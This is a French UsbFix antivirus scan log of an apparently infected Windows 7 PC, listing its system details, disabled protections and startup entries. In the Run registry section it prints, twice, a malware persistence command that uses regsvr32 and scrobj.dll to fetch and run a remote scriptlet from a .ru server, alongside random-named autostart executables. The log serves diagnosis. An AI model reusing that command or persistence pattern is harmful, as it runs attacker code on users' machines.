############################## | UsbFix Premium V 10.006 | [Recherche]

Utilisateur: poste11 (Administrateur) # POSTE11-PC
Mis à jour le 06/01/2018 par SOSVirus
Lancé à 11:05:54 | 15/01/2018

Site Web : https://www.usb-antivirus.com/fr/
Contact : https://www.usb-antivirus.com/fr/contact/

################## | System information |

MB: MSI (G41M-P33 Combo(MS-7592))
CPU: Pentium(R) Dual-Core CPU E5700 @ 3.00GHz
GC: Intel(R) G41 Express Chipset
RAM -> [Total : 2013 Mo | Free : 342 Mo]
Bios: American Megatrends Inc.
Boot: Normal boot
OS: Microsoft™ Windows 7 Ultimate (6.1.7601 32-Bit) Service Pack 1
WB: Internet Explorer : 8.00.7600.16385
WB: Google Chrome : 63.0.3239.132
WB: Mozilla Firefox : 57.0.4
WB: Opera : 50.0.2762.58

################## | Security Information |

AV: 360 Total Security [(!) Désactivé |A jour]
AS: Windows Defender [Actif |(!) Non à jour]
AS: 360 Total Security [(!) Désactivé |A jour]
FW: Windows Firewall [Actif]
SC: Security Center [Actif]
WU: Windows Update [Actif]

################## | Disk Information |

C:\ (%SystemDrive%) -> Disque fixe # 57 Go (5 Go libre(s) - 9%) [] # NTFS
E:\ -> Disque fixe # 4 Go (4 Go libre(s) - 98%) [LILIA] # FAT32

################## | Autorun |

################## | Recherche générique |

Ignoré! E:\LILIA (4GB).lnk
Ignoré! C:\Users\poste11\AppData\Roaming\eez135sfhU.exe
Ignoré! C:\Users\poste11\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f.lnk
Ignoré! C:\Users\poste11\AppData\Roaming\eemobdfSF2.exe
Ignoré! C:\Users\poste11\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t.lnk
Ignoré! HKCU\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi
Ignoré! HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi
Ignoré! HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi
Ignoré! HKU\360SandBox\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi
Ignoré! HKU\360SandBox\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi
Ignoré! HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi
Ignoré! HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi
Ignoré! HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi
Ignoré! HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi
Ignoré! HKU\S-1-5-21-1469585373-830821537-676779224-1000\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi
Ignoré! HKU\S-1-5-21-1469585373-830821537-676779224-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi
Ignoré! HKU\S-1-5-21-1469585373-830821537-676779224-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi
Ignoré! HKU\S-1-5-21-1469585373-830821537-676779224-1000_Classes\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi
Ignoré! HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi
Ignoré! HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi
Ignoré! HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,pfhhdmi

################## | Regedit Run |

F2 - HKLM\..\Winlogon : [Shell] explorer.exe
F2 - HKLM\..\Winlogon : [Userinit] C:\Windows\system32\userinit.exe,
04 - HKCU\..\Run : [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
04 - HKCU\..\Run : [pfhhdmi] C:\Users\poste11\AppData\Roaming\Microsoft\bfrvvdui\wtacgjij.exe
04 - HKCU\..\Run : [COM+] regsvr32 /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll
04 - HKCU\..\Run : [GenieFloater] C:\Program Files\Genie Soft\Genie Cleaner\GenieFloater.exe
04 - HKCU\..\Policies\Explorer\run : [pfhhdmi] C:\Users\poste11\AppData\Roaming\Microsoft\bfrvvdui\wtacgjij.exe
04 - HKLM\..\Run : [IgfxTray] C:\Windows\system32\igfxtray.exe
04 - HKLM\..\Run : [HotKeysCmds] C:\Windows\system32\hkcmd.exe
04 - HKLM\..\Run : [Persistence] C:\Windows\system32\igfxpers.exe
04 - HKLM\..\Run : [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
04 - HKLM\..\Run : [QHSafeTray] "C:\Program Files\360\Total Security\safemon\QHSafeTray.exe" /start
04 - HKLM\..\Run : [Client] "C:\PROGRA~1\TinaSoft\EASYCA~1\client.exe"
04 - HKLM\..\Run : [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe -s
04 - HKLM\..\Run : [ControlCenter4] C:\Program Files\ControlCenter4\BrCcBoot.exe /autorun
04 - HKLM\..\Run : [BrStsMon00] C:\Program Files\Browny02\Brother\BrStMonW.exe /AUTORUN
04 - HKLM\..\Run : [BrHelp] C:\Program Files\Brother\Brother Help\BrotherHelp.exe /AUTORUN
04 - HKU\S-1-5-19\..\Run : [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
04 - HKU\S-1-5-20\..\Run : [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Run : [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Run : [pfhhdmi] C:\Users\poste11\AppData\Roaming\Microsoft\bfrvvdui\wtacgjij.exe
04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Run : [COM+] regsvr32 /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll
04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Run : [GenieFloater] C:\Program Files\Genie Soft\Genie Cleaner\GenieFloater.exe
04 - HKU\S-1-5-19\..\RunOnce : [mctadmin] C:\Windows\System32\mctadmin.exe
04 - HKU\S-1-5-20\..\RunOnce : [mctadmin] C:\Windows\System32\mctadmin.exe
04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Policies\Explorer\run : [pfhhdmi] C:\Users\poste11\AppData\Roaming\Microsoft\bfrvvdui\wtacgjij.exe
04GS - F.lnk : C:\Users\poste11\AppData\Roaming\eez135sfhU.exe
04GS - T.lnk : C:\Users\poste11\AppData\Roaming\eemobdfSF2.exe
04GS - McAfee Security Scan Plus.lnk : C:\Program Files\McAfee Security Scan\3.11.599\SSScheduler.exe

################## | E.O.F |